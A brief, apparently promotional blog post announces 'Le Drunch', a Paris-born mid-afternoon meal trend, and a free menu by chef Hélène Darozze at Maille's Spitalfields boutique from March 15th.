with this Le Drunch, we mean, have you seen this…have you heard about this? Apparently it’s from a recent trend in Paris where people have began to eat a little later in the afternoon normally on weekends, opening up a new dinning occasion between lunch and dinner, hence Le Drunch…

The trend is now making it’s way over the channel with two Michelin-starred chef, Hélène Darozze who had created an exclusive Le Drunch menu for Maille. Launching at the Maille Boutique in Spitalfields from March 15th you can make room for this new meal time between 3pm and 6pm and sample Hélène’s Le Drunch menu for free. Spaces are bookable at maille.co.uk or you can try your luck and just rock up. Think Crab Cakes with a sweet mustard dressing and Caramelised Apples with Salted Butter. A new meal time…this is something we could get used too. Tres bon.
